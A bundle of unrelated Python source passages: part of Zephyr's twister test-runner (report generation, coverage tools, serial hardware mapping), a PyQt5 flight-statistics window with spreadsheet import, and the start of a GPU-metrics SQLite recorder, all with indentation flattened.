case.create_overlay(case.platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
self.discards = discards
self.selected_platforms = set(p.platform.name for p in self.instances.values())
remove_from_discards = [] # configurations to be removed from discards.
for instance in self.discards:
instance.reason = self.discards[instance]
# If integration mode is on all skips on integration_platforms are treated as errors.
if self.integration and instance.platform.name in instance.testsuite.integration_platforms \
and "Quarantine" not in instance.reason:
instance.status = "error"
instance.reason += " but is one of the integration platforms"
self.instances[instance.name] = instance
# Such configuration has to be removed from discards to make sure it won't get skipped
remove_from_discards.append(instance)
else:
instance.status = "filtered"
instance.add_missing_testscases(instance.status)
# Remove from discards configurations that must not be discarded
# (e.g. integration_platforms when --integration was used)
for instance in remove_from_discards:
del self.discards[instance]
self.filtered_platforms = set(p.platform.name for p in self.instances.values()
if p.status != "skipped" )
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
def add_tasks_to_queue(self, pipeline, build_only=False, test_only=False, retry_build_errors=False):
for instance in self.instances.values():
if build_only:
instance.run = False
no_retry_statuses = ['passed', 'skipped', 'filtered']
if not retry_build_errors:
no_retry_statuses.append("error")
if instance.status not in no_retry_statuses:
logger.debug(f"adding {instance.name}")
instance.status = None
if test_only and instance.run:
pipeline.put({"op": "run", "test": instance})
else:
pipeline.put({"op": "cmake", "test": instance})
def pipeline_mgr(self, pipeline, done_queue, lock, results):
while True:
try:
task = pipeline.get_nowait()
except queue.Empty:
break
else:
test = task['test']
pb = ProjectBuilder(self,
test,
lsan=self.enable_lsan,
asan=self.enable_asan,
ubsan=self.enable_ubsan,
coverage=self.enable_coverage,
extra_args=self.extra_args,
device_testing=self.device_testing,
cmake_only=self.cmake_only,
cleanup=self.cleanup,
valgrind=self.enable_valgrind,
inline_logs=self.inline_logs,
generator=self.generator,
generator_cmd=self.generator_cmd,
verbose=self.verbose,
warnings_as_errors=self.warnings_as_errors,
overflow_as_errors=self.overflow_as_errors,
suite_name_check=self.suite_name_check,
seed=self.seed
)
pb.process(pipeline, done_queue, task, lock, results)
return True
def execute(self, pipeline, done, results):
lock = Lock()
logger.info("Adding tasks to the queue...")
self.add_tasks_to_queue(pipeline, self.build_only, self.test_only,
retry_build_errors=self.retry_build_errors)
logger.info("Added initial list of jobs to queue")
processes = []
for job in range(self.jobs):
logger.debug(f"Launch process {job}")
p = Process(target=self.pipeline_mgr, args=(pipeline, done, lock, results, ))
processes.append(p)
p.start()
try:
for p in processes:
p.join()
except KeyboardInterrupt:
logger.info("Execution interrupted")
for p in processes:
p.terminate()
return results
@staticmethod
def process_log(log_file):
filtered_string = ""
if os.path.exists(log_file):
with open(log_file, "rb") as f:
log = f.read().decode("utf-8")
filtered_string = ''.join(filter(lambda x: x in string.printable, log))
return filtered_string
@staticmethod
def xunit_testcase(eleTestsuite, name, classname, status, ts_status, reason, duration, runnable, stats, log, build_only_as_skip):
fails, passes, errors, skips = stats
if status in ['skipped', 'filtered']:
duration = 0
eleTestcase = ET.SubElement(
eleTestsuite, "testcase",
classname=classname,
name=f"{name}",
time=f"{duration}")
if status in ['skipped', 'filtered']:
skips += 1
# temporarily add build_only_as_skip to restore existing CI report behaviour
if ts_status == "passed" and not runnable:
tc_type = "build"
else:
tc_type = status
ET.SubElement(eleTestcase, 'skipped', type=f"{tc_type}", message=f"{reason}")
elif status in ["failed", "blocked"]:
fails += 1
el = ET.SubElement(eleTestcase, 'failure', type="failure", message=f"{reason}")
if log:
el.text = log
elif status == "error":
errors += 1
el = ET.SubElement(eleTestcase, 'error', type="failure", message=f"{reason}")
if log:
el.text = log
elif status == 'passed':
if not runnable and build_only_as_skip:
ET.SubElement(eleTestcase, 'skipped', type="build", message="built only")
skips += 1
else:
passes += 1
else:
if not status:
logger.debug(f"{name}: No status")
ET.SubElement(eleTestcase, 'skipped', type=f"untested", message="No results captured, testsuite misconfiguration?")
else:
logger.error(f"{name}: Unknown status '{status}'")
return (fails, passes, errors, skips)
# Generate a report with all testsuites instead of doing this per platform
def xunit_report_suites(self, json_file, filename):
json_data = {}
with open(json_file, "r") as json_results:
json_data = json.load(json_results)
env = json_data.get('environment', {})
version = env.get('zephyr_version', None)
eleTestsuites = ET.Element('testsuites')
all_suites = json_data.get("testsuites", [])
suites_to_report = all_suites
# do not create entry if everything is filtered out
if not self.detailed_skipped_report:
suites_to_report = list(filter(lambda d: d.get('status') != "filtered", all_suites))
for suite in suites_to_report:
duration = 0
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=suite.get("name"), time="0",
timestamp = self.timestamp,
tests="0",
failures="0",
errors="0", skipped="0")
eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
ET.SubElement(eleTSPropetries, 'property', name="platform", value=suite.get("platform"))
ET.SubElement(eleTSPropetries, 'property', name="architecture", value=suite.get("arch"))
total = 0
fails = passes = errors = skips = 0
handler_time = suite.get('execution_time', 0)
runnable = suite.get('runnable', 0)
duration += float(handler_time)
ts_status = suite.get('status')
for tc in suite.get("testcases", []):
status = tc.get('status')
reason = tc.get('reason', suite.get('reason', 'Unknown'))
log = tc.get("log", suite.get("log"))
tc_duration = tc.get('execution_time', handler_time)
name = tc.get("identifier")
classname = ".".join(name.split(".")[:2])
fails, passes, errors, skips = self.xunit_testcase(eleTestsuite,
name, classname, status, ts_status, reason, tc_duration, runnable,
(fails, passes, errors, skips), log, True)
total = (errors + passes + fails + skips)
eleTestsuite.attrib['time'] = f"{duration}"
eleTestsuite.attrib['failures'] = f"{fails}"
eleTestsuite.attrib['errors'] = f"{errors}"
eleTestsuite.attrib['skipped'] = f"{skips}"
eleTestsuite.attrib['tests'] = f"{total}"
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
def xunit_report(self, json_file, filename, selected_platform=None, full_report=False):
if selected_platform:
selected = [selected_platform]
logger.info(f"Writing target report for {selected_platform}...")
else:
logger.info(f"Writing xunit report {filename}...")
selected = self.selected_platforms
json_data = {}
with open(json_file, "r") as json_results:
json_data = json.load(json_results)
env = json_data.get('environment', {})
version = env.get('zephyr_version', None)
eleTestsuites = ET.Element('testsuites')
all_suites = json_data.get("testsuites", [])
for platform in selected:
suites = list(filter(lambda d: d['platform'] == platform, all_suites))
# do not create entry if everything is filtered out
if not self.detailed_skipped_report:
non_filtered = list(filter(lambda d: d.get('status') != "filtered", suites))
if not non_filtered:
continue
duration = 0
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=platform,
timestamp = self.timestamp,
time="0",
tests="0",
failures="0",
errors="0", skipped="0")
eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
total = 0
fails = passes = errors = skips = 0
for ts in suites:
handler_time = ts.get('execution_time', 0)
runnable = ts.get('runnable', 0)
duration += float(handler_time)
ts_status = ts.get('status')
# Do not report filtered testcases
if ts_status == 'filtered' and not self.detailed_skipped_report:
continue
if full_report:
for tc in ts.get("testcases", []):
status = tc.get('status')
reason = tc.get('reason', ts.get('reason', 'Unknown'))
log = tc.get("log", ts.get("log"))
tc_duration = tc.get('execution_time', handler_time)
name = tc.get("identifier")
classname = ".".join(name.split(".")[:2])
fails, passes, errors, skips = self.xunit_testcase(eleTestsuite,
name, classname, status, ts_status, reason, tc_duration, runnable,
(fails, passes, errors, skips), log, True)
else:
reason = ts.get('reason', 'Unknown')
name = ts.get("name")
classname = f"{platform}:{name}"
log = ts.get("log")
fails, passes, errors, skips = self.xunit_testcase(eleTestsuite,
name, classname, ts_status, ts_status, reason, duration, runnable,
(fails, passes, errors, skips), log, False)
total = (errors + passes + fails + skips)
eleTestsuite.attrib['time'] = f"{duration}"
eleTestsuite.attrib['failures'] = f"{fails}"
eleTestsuite.attrib['errors'] = f"{errors}"
eleTestsuite.attrib['skipped'] = f"{skips}"
eleTestsuite.attrib['tests'] = f"{total}"
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
def json_report(self, filename, version="NA"):
logger.info(f"Writing JSON report {filename}")
report = {}
report["environment"] = {"os": os.name,
"zephyr_version": version,
"toolchain": self.get_toolchain()
}
suites = []
for instance in self.instances.values():
suite = {}
handler_log = os.path.join(instance.build_dir, "handler.log")
build_log = os.path.join(instance.build_dir, "build.log")
device_log = os.path.join(instance.build_dir, "device.log")
handler_time = instance.metrics.get('handler_time', 0)
ram_size = instance.metrics.get ("ram_size", 0)
rom_size = instance.metrics.get("rom_size",0)
suite = {
"name": instance.testsuite.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
}
if instance.run_id:
suite['run_id'] = instance.run_id
suite["runnable"] = False
if instance.status != 'filtered':
suite["runnable"] = instance.run
if ram_size:
suite["ram_size"] = ram_size
if rom_size:
suite["rom_size"] = rom_size
if instance.status in ["error", "failed"]:
suite['status'] = instance.status
suite["reason"] = instance.reason
# FIXME
if os.path.exists(handler_log):
suite["log"] = self.process_log(handler_log)
elif os.path.exists(device_log):
suite["log"] = self.process_log(device_log)
else:
suite["log"] = self.process_log(build_log)
elif instance.status == 'filtered':
suite["status"] = "filtered"
suite["reason"] = instance.reason
elif instance.status == 'passed':
suite["status"] = "passed"
elif instance.status == 'skipped':
suite["status"] = "skipped"
suite["reason"] = instance.reason
if instance.status is not None:
suite["execution_time"] = f"{float(handler_time):.2f}"
testcases = []
if len(instance.testcases) == 1:
single_case_duration = f"{float(handler_time):.2f}"
else:
single_case_duration = 0
for case in instance.testcases:
testcase = {}
testcase['identifier'] = case.name
if instance.status:
if single_case_duration:
testcase['execution_time'] = single_case_duration
else:
testcase['execution_time'] = f"{float(case.duration):.2f}"
if case.output != "":
testcase['log'] = case.output
if case.status == "skipped":
if instance.status == "filtered":
testcase["status"] = "filtered"
else:
testcase["status"] = "skipped"
testcase["reason"] = case.reason or instance.reason
else:
testcase["status"] = case.status
if case.reason:
testcase["reason"] = case.reason
testcases.append(testcase)
suite['testcases'] = testcases
suites.append(suite)
report["testsuites"] = suites
with open(filename, "wt") as json_file:
json.dump(report, json_file, indent=4, separators=(',',':'))
def get_testsuite(self, identifier):
results = []
for _, ts in self.testsuites.items():
for case in ts.testcases:
if case == identifier:
results.append(ts)
return results
def verify_platforms_existence(self, platform_names_to_verify, log_info=""):
"""
Verify if platform name (passed by --platform option, or in yaml file
as platform_allow or integration_platforms options) is correct. If not -
log and raise error.
"""
for platform in platform_names_to_verify:
if platform in self.platform_names:
break
else:
logger.error(f"{log_info} - unrecognized platform - {platform}")
sys.exit(2)
def create_build_dir_links(self):
"""
Iterate through all no-skipped instances in suite and create links
for each one build directories. Those links will be passed in the next
steps to the CMake command.
"""
links_dir_name = "twister_links" # folder for all links
links_dir_path = os.path.join(self.outdir, links_dir_name)
if not os.path.exists(links_dir_path):
os.mkdir(links_dir_path)
for instance in self.instances.values():
if instance.status != "skipped":
self._create_build_dir_link(links_dir_path, instance)
def _create_build_dir_link(self, links_dir_path, instance):
"""
Create build directory with original "long" path. Next take shorter
path and link them with original path - create link. At the end
replace build_dir to created link. This link will be passed to CMake
command. This action helps to limit path length which can be
significant during building by CMake on Windows OS.
"""
os.makedirs(instance.build_dir, exist_ok=True)
link_name = f"test_{self.link_dir_counter}"
link_path = os.path.join(links_dir_path, link_name)
if os.name == "nt": # if OS is Windows
command = ["mklink", "/J", f"{link_path}", f"{instance.build_dir}"]
subprocess.call(command, shell=True)
else: # for Linux and MAC OS
os.symlink(instance.build_dir, link_path)
# Here original build directory is replaced with symbolic link. It will
# be passed to CMake command
instance.build_dir = link_path
self.link_dir_counter += 1
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Gcovr()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
logger.debug(f"Select {tool} as the coverage tool...")
return t
@staticmethod
def retrieve_gcov_data(input_file):
logger.debug("Working on %s" % input_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(input_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
# if kobject_hash is given for coverage gcovr fails
# hence skipping it problem only in gcovr v4.1
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append('*/' + pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
cmd = ["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(".*/" + pattern + '/.*')
@staticmethod
def _interleave_list(prefix, list):
tuple_list = [(prefix, item) for item in list]
return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
cmd = ["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes + ["--json", "-o",
coveragefile, outdir]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class DUT(object):
def __init__(self,
id=None,
serial=None,
serial_baud=None,
platform=None,
product=None,
serial_pty=None,
connected=False,
runner_params=None,
pre_script=None,
post_script=None,
post_flash_script=None,
runner=None):
self.serial = serial
self.baud = serial_baud or 115200
self.platform = platform
self.serial_pty = serial_pty
self._counter = Value("i", 0)
self._available = Value("i", 1)
self.connected = connected
self.pre_script = pre_script
self.id = id
self.product = product
self.runner = runner
self.runner_params = runner_params
self.fixtures = []
self.post_flash_script = post_flash_script
self.post_script = post_script
self.pre_script = pre_script
self.probe_id = None
self.notes = None
self.lock = Lock()
self.match = False
@property
def available(self):
with self._available.get_lock():
return self._available.value
@available.setter
def available(self, value):
with self._available.get_lock():
self._available.value = value
@property
def counter(self):
with self._counter.get_lock():
return self._counter.value
@counter.setter
def counter(self, value):
with self._counter.get_lock():
self._counter.value = value
def to_dict(self):
d = {}
exclude = ['_available', '_counter', 'match']
v = vars(self)
for k in v.keys():
if k not in exclude and v[k]:
d[k] = v[k]
return d
def __repr__(self):
return f"<{self.platform} ({self.product}) on {self.serial}>"
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "schemas", "twister", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*', 'STLINK-V3'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.duts = []
def add_device(self, serial, platform, pre_script, is_pty, baud=None):
device = DUT(platform=platform, connected=True, pre_script=pre_script, serial_baud=baud)
if is_pty:
device.serial_pty = serial
else:
device.serial = serial
self.duts.append(device)
def load(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
duts = scl.yaml_load_verify(map_file, hwm_schema)
for dut in duts:
pre_script = dut.get('pre_script')
post_script = dut.get('post_script')
post_flash_script = dut.get('post_flash_script')
platform = dut.get('platform')
id = dut.get('id')
runner = dut.get('runner')
runner_params = dut.get('runner_params')
serial_pty = dut.get('serial_pty')
serial = dut.get('serial')
baud = dut.get('baud', None)
product = dut.get('product')
fixtures = dut.get('fixtures', [])
connected= dut.get('connected') and ((serial or serial_pty) is not None)
new_dut = DUT(platform=platform,
product=product,
runner=runner,
runner_params=runner_params,
id=id,
serial_pty=serial_pty,
serial=serial,
serial_baud=baud,
connected=connected,
pre_script=pre_script,
post_script=post_script,
post_flash_script=post_flash_script)
new_dut.fixtures = fixtures
new_dut.counter = 0
self.duts.append(new_dut)
def scan(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = DUT(platform="unknown",
id=d.serial_number,
serial=persistent_map.get(d.device, d.device),
product=d.product,
runner='unknown',
connected=True)
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev.runner = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev.runner = runner
s_dev.connected = True
s_dev.lock = None
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def save(self, hwm_file):
# use existing map
self.detected.sort(key=lambda x: x.serial or '')
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=SafeLoader)
if hwm:
hwm.sort(key=lambda x: x.get('id', ''))
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
for _detected in self.detected:
for h in hwm:
if _detected.id == h['id'] and _detected.product == h['product'] and not _detected.match:
h['connected'] = True
h['serial'] = _detected.serial
_detected.match = True
new_duts = list(filter(lambda d: not d.match, self.detected))
new = []
for d in new_duts:
new.append(d.to_dict())
if hwm:
hwm = hwm + new
else:
hwm = new
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False)
self.load(hwm_file)
logger.info("Registered devices:")
self.dump()
else:
# create new file
dl = []
for _connected in self.detected:
platform = _connected.platform
id = _connected.id
runner = _connected.runner
serial = _connected.serial
product = _connected.product
d = {
'platform': platform,
'id': id,
'runner': runner,
'serial': serial,
'product': product,
'connected': _connected.connected
}
dl.append(d)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(dl, yaml_file, Dumper=Dumper, default_flow_style=False)
logger.info("Detected devices:")
self.dump(detected=True)
def dump(self, filtered=[], header=[], connected_only=False, detected=False):
print("")
table = []
if detected:
to_show = self.detected
else:
to_show = self.duts
if not header:
header = ["Platform", "ID", "Serial device"]
for p in to_show:
platform = p.platform
connected = p.connected
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.id, p.serial])
print(tabulate(table, headers=header, tablefmt="github"))
def init(colorama_strip):
colorama.init(strip=colorama_strip)
|
main_window.py
|
from PyQt5 import QtWidgets as QtW
from PyQt5.QtGui import QCursor
from PyQt5.QtCore import Qt
from .widgets.time_bar_widget import TimeBarWidget
from datetime import datetime
from threading import Thread
from time import sleep
from math import ceil
from settings import Settings
from .new_flight_window import NewFlightWindow
from .pending_flights_window import PendingFlightsWindow
from .close_confirmation_window import CloseConfirmationWindow
from .total_stats_window import TotalStatsWindow
from database import FlightStatistics
from openpyxl import load_workbook
class MainWindow(QtW.QWidget):
def __init__(self):
super().__init__()
self.__layout = QtW.QGridLayout()
self.__saved_flights_layout = QtW.QGridLayout()
self.__group_box = QtW.QGroupBox()
self.__clock = QtW.QLabel('00:00')
self.__clock.setProperty('color', 'color_vlight')
self.__layout.addWidget(self.__clock, 0, 0)
self.__row_count = 0
for i in range(24):
self.__layout.addWidget(QtW.QLabel(f'{i}:00'), 0, i+1)
self.render_flights()
self.__label_status = QtW.QLabel('READY')
self.__label_status.setProperty('color', 'color_green')
self.__layout.addWidget(self.__label_status, 0, 25)
self.__group_box.setLayout(self.__saved_flights_layout)
self.__scroll_area = QtW.QScrollArea()
self.__scroll_area.setWidget(self.__group_box)
self.__scroll_area.setWidgetResizable(True)
self.__scroll_area.setFixedHeight(400)
self.__layout.addWidget(self.__scroll_area, 1, 0, 1, 26)
button_new_flight = QtW.QPushButton('New flight', self)
button_show_pending = QtW.QPushButton('Show pending', self)
button_stats = QtW.QPushButton('Show total', self)
button_import = QtW.QPushButton('Import', self)
button_import.pressed.connect(self.__import_data)
button_new_flight.setCursor(QCursor(Qt.PointingHandCursor))
button_show_pending.setCursor(QCursor(Qt.PointingHandCursor))
button_stats.setCursor(QCursor(Qt.PointingHandCursor))
button_import.setCursor(QCursor(Qt.PointingHandCursor))
self.__layout.addWidget(button_new_flight, 2, 0, 1, 3)
self.__layout.addWidget(button_show_pending, 2, 3, 1, 3)
self.__layout.addWidget(button_stats, 2, 6, 1, 3)
self.__layout.addWidget(button_import, 2, 9, 1, 3)
label_copyright = QtW.QLabel(f'© {datetime.now().year} osx11')
label_copyright.setProperty('color', 'color_vlight')
self.__layout.addWidget(label_copyright, 2, 24, 1, 2)
Thread(target=self.__update_clock, daemon=True).start()
self.__new_flight_window = NewFlightWindow()
button_new_flight.clicked.connect(self.__new_flight_window.show)
self.__pending_flights_window = PendingFlightsWindow(self)
button_show_pending.clicked.connect(self.__show_pending_flights_window)
self.__total_stats_window = TotalStatsWindow()
button_stats.clicked.connect(self.__show_total_stats_window)
self.__close_confirmation_window = CloseConfirmationWindow(self)
self.setFixedSize(1300, 505)
self.setWindowTitle('Flight Statistics')
self.setLayout(self.__layout)
self.setStyleSheet(Settings().style)
self.show()
def set_status(self, status, color='color_green'):
self.__label_status.setText(status)
self.__label_status.setProperty('color', color)
self.__label_status.style().polish(self.__label_status)
def __clear_saved_flights_layout(self):
for i in reversed(range(self.__saved_flights_layout.count())):
self.__saved_flights_layout.itemAt(i).widget().setParent(None)
# this have to be filled with empty labels otherwise timebars will be displayed incorrectly
for i in range(25):
self.__saved_flights_layout.addWidget(QtW.QLabel(''), 0, i)
def render_flights(self):
self.__clear_saved_flights_layout()
query = (FlightStatistics
.select()
.where(FlightStatistics.actual_arrival_time != None))
self.__row_count = query.count()
previous_pos_was_nextday = False
pos = 0
for flight in query:
departure_date = flight.scheduled_departure_date[:5]
arrival_date = flight.actual_arrival_date[:5]
actual_departure_hour = int(flight.actual_departure_time[:2])
actual_arrival_hour = int(flight.actual_arrival_time[:2])
flight_time = ceil(float(flight.flight_time[:2]) + float(flight.flight_time[-2:])/60)
if actual_departure_hour == 0:
actual_departure_hour = 1
if actual_arrival_hour == 0:
actual_arrival_hour += 1
if flight_time == 0:
flight_time = 1
arrived_next_day = arrival_date > departure_date
no_distance = flight.distance == 0
timebar = TimeBarWidget(self,
f'{flight.departure_icao}-{flight.arrival_icao}',
flight_time,
flight.id,
no_distance=no_distance)
timebar_nextday = TimeBarWidget(self,
f'{flight.departure_icao}-{flight.arrival_icao}',
flight_time, flight.id,
is_next_day=True)
if not arrived_next_day:
if previous_pos_was_nextday:
pos += 1
previous_pos_was_nextday = False
self.__saved_flights_layout.addWidget(QtW.QLabel(departure_date), pos, 0)
self.__saved_flights_layout.addWidget(timebar, pos, actual_departure_hour, 1, flight_time)
else:
previous_pos_was_nextday = True
self.__saved_flights_layout.addWidget(QtW.QLabel(departure_date), pos, 0)
self.__saved_flights_layout.addWidget(QtW.QLabel(arrival_date), pos+1, 0)
self.__saved_flights_layout.addWidget(timebar, pos, actual_departure_hour, 1, (24-actual_departure_hour))
self.__saved_flights_layout.addWidget(timebar_nextday, pos+1, 1, 1, actual_arrival_hour)
pos += 1
def __update_clock(self):
while True:
now = datetime.utcnow()
hour = now.hour
if hour < 10:
hour = f'0{hour}'
minute = now.minute
if minute < 10:
minute = f'0{minute}'
remaining = 60 - now.second
self.__clock.setText(f'{hour}:{minute}Z')
sleep(remaining)
def __show_pending_flights_window(self):
self.__pending_flights_window.update_flight_schedule()
self.__pending_flights_window.show()
def __show_total_stats_window(self):
self.__total_stats_window.update_statistics()
self.__total_stats_window.show()
def __import_data(self):
file_url = QtW.QFileDialog().getOpenFileName()[0]
if not file_url:
return
workbook = load_workbook(file_url)
sheet = workbook.active
i = 6
while dep_city := sheet[f'A{i}'].value:
dep_icao = sheet[f'B{i}'].value
dep_dt = sheet[f'C{i}'].value
arr_city = sheet[f'D{i}'].value
arr_icao = sheet[f'E{i}'].value
arr_dt = sheet[F'F{i}'].value
aircraft = sheet[f'H{i}'].value
dist = sheet[f'I{i}'].value
flight_time = sheet[f'L{i}'].value
FlightStatistics.create(flight_number='OSX11',
scheduled_departure_date=dep_dt.strftime('%d.%m.%y'),
scheduled_departure_time=dep_dt.strftime('%H:%M'),
actual_arrival_date=arr_dt.strftime('%d.%m.%y'),
actual_departure_time=dep_dt.strftime('%H:%M'),
actual_arrival_time=arr_dt.strftime('%H:%M'),
aircraft=aircraft,
departure_icao=dep_icao,
arrival_icao=arr_icao,
departure_city=dep_city,
arrival_city=arr_city,
flight_time=flight_time.strftime('%H:%M'),
distance=dist)
i += 1
self.render_flights()
def closeEvent(self, event):
if FlightStatistics.has_opened_flight():
self.__close_confirmation_window.show()
event.ignore()
|
gpu_db_recorder.py
|
import json
import os
import sqlite3
import threading
import time
import systemmonitor
DATABASE = 'database.db'
EVENTS_FOLDER = 'events'
def get_db():
db = sqlite3.connect(DATABASE)
db.execute("""
CREATE TABLE IF NOT EXISTS events (
timestmp FLOAT NOT NULL,
description TEXT NOT NULL,
model INTEGER
)
""")
db.execute("""
CREATE TABLE IF NOT EXISTS gpu (
mean_time FLOAT NOT NULL,
id_on_system INTEGER NOT NULL,
identifier VARCHAR NOT NULL,
util FLOAT NOT NULL,
memory_abs FLOAT NOT NULL,
memory_util FLOAT NOT NULL,
temp FLOAT NOT NULL
)
""")
db.commit()
return db
class Event:
def __init__(self,
desc: str,
model: int):
